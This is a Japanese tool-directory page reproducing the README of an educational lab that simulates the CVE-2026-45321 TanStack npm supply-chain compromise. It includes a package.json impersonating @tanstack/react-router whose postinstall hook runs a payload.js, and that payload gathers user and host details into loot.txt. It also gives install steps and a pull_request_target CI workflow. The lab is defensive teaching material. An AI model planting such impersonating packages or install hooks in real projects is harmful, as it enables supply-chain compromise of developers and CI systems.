Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-45321-Tanstack | Kitploit
ツール/GitHubGitHub/renewablehacking/cve-2026-45321-tanstack
脆弱性分析マルウェア分析サプライチェーンセキュリティ学習と教育ラボと実践
GitHubrenewablehacking/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

サプライチェーン攻撃シミュレーション — CVE-2026-45321 (TanStack)

npm サプライチェーン攻撃、CI/CD の悪用、インストール時コード実行を理解するための教育用ラボ

免責事項

このプロジェクトは以下の目的のみで作成されています:

  • サイバーセキュリティの学習、
  • ディフェンシブセキュリティの研究、
  • ローカルラボでのシミュレーション、
  • サプライチェーン攻撃の概念の理解。

このプロジェクトを以下の目的で使用しないでください:

  • 実在のシステムへの攻撃、
  • 認証情報の窃取、
  • マルウェアの展開、
  • 不正アクセス、
  • またはその他の違法行為。

説明

このラボは、以下のインシデントの基本概念をシミュレーションします:

  • CVE-2026-45321
  • TanStack npm サプライチェーン侵害
  • GitHub Actions CI/CD の悪用
  • npm ライフサイクルスクリプトの実行

シミュレーションはローカルで安全に実行され、以下は行いません:

  • 実際の認証情報の窃取、
  • トークンの外部送信、
  • またはサードパーティサービスへの侵害。

ラボの構成

root@kitploit:~
lab/
├── fake-repo/          # 対象リポジトリのシミュレーション
├── attacker-package/   # 悪意のあるパッケージのシミュレーション
└── victim-project/     # 被害者のシミュレーション

シミュレーションの仕組み

root@kitploit:~
攻撃者パッケージ
        ↓
npm install
        ↓
postinstall スクリプトが実行される
        ↓
payload.js が自動実行される
        ↓
被害者がインストール時実行の影響を受ける

学べる概念

  • npm ライフサイクルフック
  • インストール時の任意コード実行
  • サプライチェーン攻撃
  • CI/CD の信頼境界
  • 悪意のある npm パッケージ
  • postinstall の悪用
  • 依存関係の侵害

インストール

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

攻撃者パッケージのセットアップ

2. 攻撃者パッケージのフォルダへ移動

root@kitploit:~
cd attacker-package

3. 依存関係のインストール

root@kitploit:~
npm install

4. Tarball パッケージのビルド

root@kitploit:~
npm pack

結果:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

被害者のシミュレーション

5. 被害者プロジェクトへ移動

root@kitploit:~
cd ../victim-project

6. 悪意のあるパッケージのインストール

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

出力

成功すると、以下が表示されます:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

また、以下のファイル:

root@kitploit:~
loot.txt

が自動的に作成されます。


payload.js の例

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

package.json の例

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CD シミュレーション

このプロジェクトは、以下を理解するためにも使用できます:

  • GitHub Actions
  • pull_request_target
  • CI/CD の権限境界
  • 依存関係の実行

ワークフロー例:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321 との関連

シミュレーションラボ実世界
attacker-package侵害された TanStack パッケージ
payload.js悪意のあるインストーラー
postinstallライフサイクルフックの悪用

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

教育目的のみ

このラボは、以下に関する認識を高めるために作成されています:

  • サプライチェーンセキュリティ、
  • 依存関係セキュリティ、
  • CI/CD セキュリティ、
  • およびディフェンシブセキュリティ研究。
ツールをダウンロード
victim-project
被害を受ける開発者/CI
fake-repoGitHub Actions パイプライン